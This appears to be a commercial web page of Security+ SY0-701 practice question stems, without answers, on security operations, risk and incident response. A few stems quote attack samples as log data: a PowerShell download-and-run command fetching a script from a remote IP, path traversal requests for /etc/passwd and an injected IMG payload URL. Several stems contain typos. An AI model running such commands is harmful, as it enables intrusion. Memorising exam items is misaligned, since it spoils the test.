Free Practice Questions for the CompTIA Security+ SY0-701 Exam (2026 Updated)
At Marks4sure, we are dedicated to providing IT professionals with the most accurate and reliable preparation materials for the CompTIA SY0-701 exam. To support your certification journey, we have made a selection of our premium 2026 CompTIA Security+ practice questions and answers available completely free. You can take this practice test as many times as you need. Every question includes a detailed, expertly verified explanation to ensure you fully grasp the core security concepts before test day.
Prior to implementing a design change, the change must go through multiple steps to ensure that it does not cause any security issues. Which of the following is most likely to be one of those steps?
A security company informs its customers of a new vulnerability that affects web applications. The vulnerability does not have an available patch at the moment. Which of the following best describes this vulnerability?
SY0-701 Report Card
A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the SaaS vendor. Which of the following processes is the analyst most likely conducting?
An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator ' s role?
A company wants to get alerts when others are researching and doing reconnaissance on the company One approach would be to host a part of the Infrastructure online with known vulnerabilities that would appear to be company assets. Which of the following describes this approach?
An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system. Which of the following best describes the actions taken by the organization?
A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?
A systems administrator needs to ensure the secure communication of sensitive data within the organization ' s private cloud. Which of the following is the best choice for the administrator to implement?
A security analyst is monitoring logs from the organization ' s SIEM and identifies logs related to one of their salespeople:
Time | IP address | Location | EmpID | App | Status
14:02 | 72.45.38.27 | Atlanta | 25687 | VPN | Success
14:04 | 72.45.38.27 | Atlanta | 25687 | Email | Failure
14:07 | 58.67.47.48 | Beijing | 25687 | VPN | Success
14:15 | 72.45.38.27 | Atlanta | 25687 | Teams | Success
Which of the following is being displayed in the logs?
Which of the following tools is best for logging and monitoring in a cloud environment?
An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofed website. Which of the following should the administrator do?
An organization experiences a suspected data breach that affects sensitive client information. The incident response team must preserve logs, server images, and email communications related to the breach. Which of the following best describes this course of action?
A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the last two months. Which of the following most likely occurred?
A security administrator is reissuing a former employee ' s laptop. Which of the following is the best combination of data handling activities for the administrator to perform? (Select two).
A security engineer would like to enhance the use of automation and orchestration within the SIEM. Which of the following would be the primary benefit of this enhancement?
As part of new compliance audit requirements, multiple servers need to be segmented on different networks and should be reachable only from authorized internal systems. Which of the following would meet the requirements?
A forensic engineer determines that the root cause of a compromise is a SQL injection attack. Which of the following should the engineer review to identify the command used by the threat actor?
A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?
Which of the following can be used to compromise a system that is running an RTOS?
A security technician determines that no additional patches can be applied to an application and the risks of operating as such must be accepted. Additionally, only a limited number of network services should utilize the application. Which of the following best describes this type of mitigation?
Which of the following would best ensure a controlled version release of a new software application?
A company is aware of a given security risk related to a specific market segment. The business chooses not to accept responsibility and target their services to a different market segment. Which of the following describes this risk management strategy?
A company is utilizing an offshore team to help support the finance department. The company wants to keep the data secure by keeping it on a company device but does not want to provide equipment to the offshore team. Which of the following should the company implement to meet this requirement?
Which of the following is an example of a false negative vulnerability detection in a scan report?
A security engineer receives reports of unauthorized devices on the organization ' s network. Which of the following best describes a secure and effective way to mitigate the risks?
A company plans to secure its systems by:
Preventing users from sending sensitive data over corporate email
Restricting access to potentially harmful websites
Which of the following features should the company set up? (Select two).
Which of the following activities is included in the post-incident review phase?
A company discovers suspicious transactions that were entered into the company ' s database and attached to a user account that was created as a trap for malicious activity. Which of the following is the user account an example of?
Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach affecting offshore offices. Which of the following is this an example of?
A company is implementing a vendor ' s security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company ' s standard user directory. Which of the following should the company implement?
Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked.
Which of the following changes would allow users to access the site?
A security administrator protects passwords by using hashing. Which of the following best describes what the administrator is doing?
Which of the following is most likely to cause reputational damage to a company?
A company has a website in a server cluster. One server is experiencing very high usage, while others are nearly unused. Which of the following should the company configure to help distribute traffic quickly?
A security engineer needs to analyze the implications of moving proprietary company data from a local server to a public cloud storage service. Which of the following actions should the engineer take first?
A security consultant needs secure, remote access to a client environment. Which of the following should the security consultant most likely use to gain access?
A manager receives an email that contains a link to receive a refund. After hovering over the link, the manager notices that the domain ' s URL points to a suspicious link. Which of the following security practices helped the manager to identify the attack?
Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?
An administrator has configured a quarantine subnet for all guest devices that connect to the network. Which of the following would be best for the security team to configure on the MDM before allowing access to corporate resources?
Which of the following should be used to select a label for a file based on the file ' s value, sensitivity, or applicable regulations?
Which of the following data recovery strategies will result in a quick recovery at low cost?
An organization ' s web servers host an online ordering system. The organization discovers that the servers are vulnerable to a malicious JavaScript injection, which could allow attackers to access customer payment information. Which of the following mitigation strategies would be most effective for preventing an attack on the organization ' s web servers? (Select two).
An employee clicks a malicious link in an email that appears to be from the company ' s Chief Executive Officer. The employee ' s computer is infected with ransomware that encrypts the company ' s files. Which of the following is the most effective way for the company to prevent similar incidents in the future?
A systems administrator is concerned about vulnerabilities within cloud computing instances Which of the following is most important for the administrator to consider when architecting a cloud computing environment?
The number of tickets the help desk has been receiving has increased recently due to numerous false-positive phishing reports. Which of the following would be best to help to reduce the false positives?
A company performs a risk assessment on the information security program each year. Which of the following best describes this risk assessment?
Which of the following can best protect against an employee inadvertently installing malware on a company system?
Which of the following should an internal auditor check for first when conducting an audit of the organization ' s risk management program?
During a SQL update of a database, a temporary field used as part of the update sequence was modified by an attacker before the update completed in order to allow access to the system. Which of the following best describes this type of vulnerability?
Which of the following risk management strategies should an enterprise adopt first if a legacy application is critical to business operations and there are preventative controls that are not yet implemented?
Which of the following actions must an organization take to comply with a person ' s request for the right to be forgotten?
Which of the following is the most likely motivation for a company administrator to look at an employee ' s personal information in a database?
Which of the following describes a situation where a user is authorized before being authenticated?
Which of the following must be considered when designing a high-availability network? (Choose two).
Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?
A software developer released a new application and is distributing application files via the developer’s website. Which of the following should the developer post on the website to allow users to verify the integrity of the downloaded files?
The management team reports employees are missing features on company-provided tablets, causing productivity issues. The team directs IT to resolve the issue within 48 hours. Which of the following is the best solution?
Which of the following involves an attempt to take advantage of database misconfigurations?
A security analyst must select a metric to determine the required investment in technology based on past availability incidents. Which of the following is the most relevant value to help select technology that mitigates risk and considers reliability?
Which of the following strategies should an organization use to efficiently manage and analyze multiple types of logs?
Which of the following resources is the most useful for a researcher to find more details about threat activities?
An administrator wants to automate an account permissions update for a large number of accounts. Which of the following would best accomplish this task?
A systems administrator receives an alert that a company ' s internal file server is very slow and is only working intermittently. The systems administrator reviews the server management software and finds the following information about the server:

Which of the following indicators most likely triggered this alert?
Which of the following security controls is a company implementing by deploying HIPS? (Select two)
An office wants to install a Wi-Fi network. The security team must ensure a secure design. The access points will be more powerful and use WPA3 with a 16-character randomized key. Which of the following should the security team do next?
An employee who was working remotely lost a mobile device containing company data. Which of the following provides the best solution to prevent future data loss?
A security analyst finds a rogue device during a monthly audit of current endpoint assets that are connected to the network. The corporate network utilizes 002.1X for access control. To be allowed on the network, a device must have a Known hardware address, and a valid user name and password must be entered in a captive portal. The following is the audit report:

Which of the following is the most likely way a rogue device was allowed to connect?
A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring?
Which of the following would be the best way to handle a critical business application that is running on a legacy server?
A security analyst estimates that a small security incident will cost $10,000 and will occur twice per year. The analyst recommends a budget of $20,000 for next year. Which of the following does the $10,000 represent?
An administrator investigating an incident is concerned about the downtime of a critical server due to a failed drive. Which of the following would the administrator use to estimate the time needed to fix the issue?
A small business initially plans to open common communications ports (21, 22, 25, 80, 443) on its firewall to allow broad access to its screened subnet. However, their security consultant advises against this action. Which of the following security principles is the consultant addressing?
A Chief Information Officer wants to ensure that network devices cannot connect to the public internet or the local network to directly perform firmware updates. The IT team must manually perform the update process by using a portable device. Which of the following architecture types best fits this description?
An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user. Which of the following best describes the type of attack that occurred?
Which of the following best explains the use of a policy engine in a Zero Trust environment?
Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow table attack?
A developer receives this message when testing a new external website:
This site cannot be reached.
Which of the following logs would most likely help identify the root cause?
An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).
A security team is setting up a new environment for hosting the organization ' s on-premises software application as a cloud-based service. Which of the following should the team ensure is in place in order for the organization to follow security best practices?
A company requires hard drives to be securely wiped before sending decommissioned systems to recycling. Which of the following best describes this policy?
A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?
A security engineer is working to address the growing risks that shadow IT services are introducing to the organization. The organization has taken a cloud-first approach end does not have an on-premises IT infrastructure. Which of the following would best secure the organization?
Which of the following should a security administrator adhere to when setting up a new set of firewall rules?
Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?
Which of the following explains how regular patching helps mitigate risks when securing an enterprise environment?
The security operations center is researching an event concerning a suspicious IP address A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced faded log-In attempts when authenticating from the same IP address:

Which of the following most likely describes attack that took place?
Which of the following allows an exploit to go undetected by the operating system?
Which of the following are the most important considerations when encrypting data? (Select two).
Which of the following consequences would a retail chain most likely face from customers in the event the retailer is non-compliant with PCI DSS?
A company ' s accounting department receives an urgent payment message from the company ' s bank domain with instructions to wire transfer funds. The sender requests that the transfer be completed as soon as possible. Which of the following attacks is described?
A security administrator receives multiple reports about the same suspicious email. Which of the following is the most likely reason for the malicious email ' s continued delivery?
The Cruel Information Security Officer (CISO) asks a security analyst to install an OS update to a production VM that has a 99% uptime SLA. The CISO tells me analyst the installation must be done as quickly as possible. Which of the following courses of action should the security analyst take first?
A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following would most likely list this expectation?
A company needs to determine whether authentication weaknesses in a customer-facing web application exist. Which of the following is the best technique to use?
A security analyst wants to better understand the behavior of users and devices in order to gain visibility into potential malicious activities. The analyst needs a control to detect when actions deviate from a common baseline Which of the following should the analyst use?
Which of the following is used to add extra complexity before using a one-way data transformation algorithm?
A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will help the company achieve this goal?
An organization wants a third-party vendor to do a penetration test that targets a specific device. The organization has provided basic information about the device. Which of the following best describes this kind of penetration test?
In order to cut costs, a company decides to implement a bring-your-own-device policy. The security team wants a solution that will reduce risk to company data, especially in cases in which devices are lost or stolen. Which of the following tools is best to address this concern?
Which of the following activities is the first stage in the incident response process?
Which of the following vulnerabilities is exploited when an attacker overwrites a register with a malicious address?
Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior within an organization?
Which of the following would be best suited for constantly changing environments?
A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following strategies is the bank requiring?
Which of the following is the best way to prevent an unauthorized user from plugging a laptop into an employee ' s phone network port and then using tools to scan for database servers?
A company prevented direct access from the database administrators’ workstations to the network segment that contains database servers. Which of the following should a database administrator use to access the database servers?
A company installed cameras and added signs to alert visitors that they are being recorded. Which of the following controls did the company implement? (Select two).
Which of the following is the stage in an investigation when forensic images are obtained?
An incident response specialist must stop a malicious attack from expanding to other parts of an organization. Which of the following should the incident response specialist perform first?
After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps should the security manager take first to increase security awareness?
After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of the following processes should the human resources department follow to track revisions?
A vendor needs to remotely and securely transfer files from one server to another using the command line. Which of the following protocols should be Implemented to allow for this type of access? (Select two).
During a routine audit, an analyst discovers that a department uses software that was not vetted. Which threat is this?
Which of the following receives logs from various devices and services, and then presents alerts?
A penetration tester is testing the security of a building’s alarm system. Which type of penetration test is being conducted?
Which of the following describes the procedures a penetration tester must follow while conducting a test?
Which of the following is a type of vulnerability that involves inserting scripts into web-based applications in order to take control of the client ' s web browser?
A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with global privacy regulations?
A systems administrator receives a text message from an unknown number claiming to be the Chief Executive Officer of the company. The message states an emergency situation requires a password reset. Which of the following threat vectors is being used?
A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?
An employee from the accounting department logs in to a website. A desktop application automatically downloads on the employee ' s computer. Which of the following has occurred?
Which of the following is die most important security concern when using legacy systems to provide production service?
A database administrator is updating the company ' s SQL database, which stores credit card information for pending purchases. Which of the following is the best method to secure the data against a potential breach?
Which of the following agreements defines response time, escalation points, and performance metrics?
Which of the following threat actors is the most likely to use large financial resources to attack critical systems located in other countries?
A customer of a large company receives a phone call from someone claiming to work for the company and asking for the customer ' s credit card information. The customer sees the caller ID is the same as the company ' s main phone number. Which of the following attacks is the customer most likely a target of?
An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the following would be most relevant for the analyst to evaluate?
While updating the security awareness training, a security analyst wants to address issues created if vendors ' email accounts are compromised. Which of the following recommendations should the security analyst include in the training?
Which of the following should be used to prevent changes to system-level data?
A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format. Which of the following should the administrator apply to the site recovery resource group?
An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device.
Which of the following best describes the user’s activity?
A Chief Information Security Officer (CISO) implements a new policy that users can no longer access fantasy sports sites while at work. The CISO wants to implement a solution that can adapt to new sites coming online and not have to constantly determine which sites are related to fantasy sports. Which of the following is the best capability for the CISO to leverage?
Which of the following is a security benefit of an effective IT asset tracking system?
A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption. Which of the following best describes this step?
One of a company ' s vendors sent an analyst a security bulletin that recommends a BIOS update. Which of the following vulnerability types is being addressed by the patch?
Which of the following actions best addresses a vulnerability found on a company ' s web server?
Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?
A security analyst notices an increase in port scans on the edge of the corporate network. Which of the following logs should the analyst check to obtain the attacker ' s source IP address?
Which of the following documents details how to accomplish a technical security task?
Which of the following is the most relevant reason a DPO would develop a data inventory?
A security report shows that during a two-week test period. 80% of employees unwittingly disclosed their SSO credentials when accessing an external website. The organization purposelycreated the website to simulate a cost-free password complexity test. Which of the following would best help reduce the number of visits to similar websites in the future?
Which of the following will harden access to a new database system? (Select two)
A security analyst reviews logs and finds a large number of malicious requests that have caused performance issues on the company ' s site. Which of the following would have most likely prevented this attack?
Which of the following is a reason an organization should use different CSPs for a critical financial application?
Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?
Which of the following examples would be best mitigated by input sanitization?
Which of the following can be used to identify potential attacker activities without affecting production servers?
After a company was compromised, customers initiated a lawsuit. The company ' s attorneys have requested that the security team initiate a legal hold in response to the lawsuit. Which of the following describes the action the security team will most likely be required to take?
Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?
Which of the following is an algorithm performed to verify that data has not been modified?
A company ' s website is www. Company. com Attackers purchased the domain wwww. company.com Which of the following types of attacks describes this example?
An organization authorizes system deployment on the network after reducing the number of Category 1 vulnerabilities to zero. Which of the following is this scenario an example of?
While considering the organization ' s cloud-adoption strategy, the Chief Information Security Officer sets a goal to outsource patching of firmware, operating systems, and applications to the chosen cloud vendor. Which of the following best meets this goal?
Which of the following would be the best way to block unknown programs from executing?
A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO ' s report?
Which of the following would be the best way to test resiliency in the event of a primary power failure?
A company uses multiple providers to send its marketing, internal, and support emails. Many of the emails are marked as spam. Which of the following changes should the company make to ensure legitimate emails are validated?
Which of the following factors are the most important to address when formulating a training curriculum plan for a security awareness program? (Select two).
A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the following types of sites should the engineer consider?
A security analyst reviews the following endpoint log:
powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )
Which of the following logs will help confirm an established connection to IP address 176.30.40.50?
Which of the following agreements defines response time, escalation, and performance metrics?
Which of the following activities would involve members of the incident response team and other stakeholders simul-ating an event?
Employees located off-site must have access to company resources in order to complete their assigned tasks These employees utilize a solution that allows remote access without interception concerns. Which of the following best describes this solution?
An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider to be the highest priority?
Client files can only be accessed by employees who need to know the information and have specified roles in the company. Which of the following best describes this security concept?
Which of the following best describes the practice of preserving and documenting the handling of forensic evidence?
A systems administrator notices that the research and development department is not using the company VPN when accessing various company-related services and systems. Which of the following scenarios describes this activity?
A company’s web filter is configured to scan the URL for strings and deny access when matches are found. Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?
A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Which of the following would be a good use case for this task?
Which of the following is a common source of unintentional corporate credential leakage in cloud environments?
A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?
Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?
While analyzing SIEM alerts for a company ' s WAF, an incident response analyst observes the following:
https://corporate-A.com/loadimage?filename=/etc/
https://corporate-A.com/loadimage?filename=../../etc/passwd
https://corporate-A.com/loadimage?filename=./etc/passwd
Which of the following best describes the observed behavior?
A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most likely use?
Which of the following provides the best protection against unwanted or insecure communications to and from a device?
A visitor plugs a laptop into a network jack in the lobby and is able to connect to the company ' s network. Which of the following should be configured on the existing network infrastructure to best prevent this activity?
A security analyst is reviewing the following logs:

Which of the following attacks is most likely occurring?
Which of the following is the best way to provide secure remote access for employees while minimizing the exposure of a company ' s internal network?
A security analyst must identify abnormal behavior on the server. Which of the following does the analyst most likely need to do?
Which of the following describes the reason root cause analysis should be conducted as part of incident response?
Which of the following is used to validate a certificate when it is presented to a user?
Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?
A company’s legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?
A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data. Which of the following should the company consider?
A security analyst investigates abnormal outbound traffic from a corporate endpoint. The traffic is encrypted and uses non-standard ports. Which of the following data sources should the analyst use first to confirm whether this traffic is malicious?
Which of the following best describes the purpose of using deception technologies in a security strategy?
A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered by an employee who attempted to download a file. Which of the following is the most likely reason the download was blocked?
A security analyst is creating the first draft of a network diagram for the company ' s new customer-facing payment application that will be hosted by a third-party cloud service
provider.


A systems administrator needs to provide traveling employees with a tool that will protect company devices regardless of where they are working. Which of the following should the administrator implement?
A security engineer configured a remote access VPN. The remote access VPN allows end users to connect to the network by using an agent that is installed on the endpoint, which establishes an encrypted tunnel. Which of the following protocols did the engineer most likely implement?
A systems administrator is working on a solution with the following requirements:
• Provide a secure zone.
• Enforce a company-wide access control policy.
• Reduce the scope of threats.
Which of the following is the systems administrator setting up?
A security analyst scans a company ' s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?
Which of the following phases of an incident response involves generating reports?
Which of the following practices would be best to prevent an insider from introducing malicious code into a company ' s development process?
An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?
Which of the following is the most effective way to protect an application server running software that is no longer supported from network threats?
Which of the following should a systems administrator use to decrease the company ' s hardware attack surface?
Which of the following security principles most likely requires validation before allowing traffic between systems?
A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of users. Which of the following would be a good use case for this task?creating a script
Following a security review, an organization must ensure users verify their identities against the company ' s identity services with individual credentials leveraging WPA2-Enterprise for wireless access. Which of the following configuration steps correctly applies RADIUS in this environment?
Which of the following threat vectors is most commonly utilized by insider threat actors attempting data exfiltration?
During a penetration test in a hypervisor, the security engineer is able to inject a malicious payload and access the host filesystem. Which of the following best describes this vulnerability?
Which of the following best explains why an organization would choose a warm site for disaster recovery?
A company wants to use new Wi-Fi-enabled environmental sensors in order to automatically collect metrics. Which of the following will the security team most likely do?
Which of the following explains how a supply chain service provider could introduce a security vulnerability into an organization?
Which of the following vulnerabilities will lead to a successful attack that injects < IMG src= ' http://attackersite.net/mycode.sh ' > into a web application?
Which of the following best explains how tokenization helps protect sensitive data?
A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?
A security administrator is implementing encryption on all hard drives in an organization. Which of the following security concepts is the administrator applying?
Which of the following most accurately describes the order in which a security engineer should implement secure baselines?
A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and the management team wants to reduce the impact when a user clicks on a link in a phishing message. Which of the following should the analyst do?
A network manager wants to protect the company ' s VPN by implementing multifactor authentication that uses:
. Something you know
. Something you have
. Something you are
Which of the following would accomplish the manager ' s goal?
An organization issued new laptops to all employees and wants to provide web filtering both in and out of the office without configuring additional access to the network. Which of the following types of web filtering should a systems administrator configure?
A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most difficult to remediate due to the company ' s reliance on open-source libraries?
Which of the following is the most likely reason a security analyst would review SIEM logs?
An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?
Which of the following would most likely be deployed to obtain and analyze attacker activity and techniques?
Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?
A new employee can select a particular make and model of an employee workstation from a preapproved list. Which of the following is this an example of?
While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following assessment types should be performed during software development to prevent this from reoccurring?
A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifies the type of vulnerability that was likely discovered during the test?
Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?
An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track and remediate these issues?
A company has yearly engagements with a service provider. The general terms and conditions are the same for all engagements. The company wants to simplify the process and revisit the general terms every three years. Which of the following documents would provide the best way to set the general terms?
Several customers want an organization to verify its security controls are operating effectively and have requested an independent opinion. Which of the following is the most efficient way to address these requests?
After reviewing the following vulnerability scanning report:
Server:192.168.14.6
Service: Telnet
Port: 23 Protocol: TCP
Status: Open Severity: High
Vulnerability: Use of an insecure network protocol
A security analyst performs the following test:
nmap -p 23 192.168.14.6 —script telnet-encryption
PORT STATE SERVICE REASON
23/tcp open telnet syn-ack
I telnet encryption:
| _ Telnet server supports encryption
Which of the following would the security analyst conclude for this reported vulnerability?
A company decides to purchase an insurance policy. Which of the following risk management strategies is this company implementing?
A company is considering an expansion of access controls for an application that contractors and internal employees use to reduce costs. Which of the following risk elements should the implementation team understand before granting access to the application?
A company must ensure that log searches are conducted in the shortest time frame. Which of the following should the company do to maintain logs in live storage for 90 days?
An IT manager is putting together a documented plan describing how the organization will keep operating in the event of a global incident. Which of the following plans is the IT manager creating?
Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach that would affect offshore offices. Which of the following is this an example of?
The help desk receives multiple calls that machines with an outdated OS version are running slowly. Several users are seeing virus detection alerts. Which of the following mitigation techniques should be reviewed first?
Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees leave a company?
Which of the following steps in the incident response process involves developing a hypothesis of possible attack paths and using various sources to confirm or deny the hypothesis?
Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?
An analyst wants to move data from production to the UAT server to test the latest release. Which of the following strategies should the analyst use to protect sensitive data from being viewed by the testing team?
A security analyst receives an alert that there was an attempt to download known malware. Which of the following actions would allow the best chance to analyze the malware?
Which of the following describes the difference between encryption and hashing?
A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA to comply with internal security policies. Which of the following should the security team recommend?
A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee’s corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation. Which of the following logs should the analyst use as a data source?
During a routine audit, an analyst discovers that a department at a high school uses a simul-ation program that was not properly vetted before deployment.
Which of the following threats is this an example of?
Which of the following environments utilizes a subset of customer data and is most likely to be used to assess the impacts of major system upgrades and demonstrate system features?
Which of the following is the best reason to complete an audit in a banking environment?
Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?
Which of the following is an example of a data protection strategy that uses tokenization?
Which of the following is a benefit of an RTO when conducting a business impact analysis?
The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on-premises web proxy. Which of the following changes will best provide web protection in this scenario?

A diagram of a computer AI-generated content may be incorrect.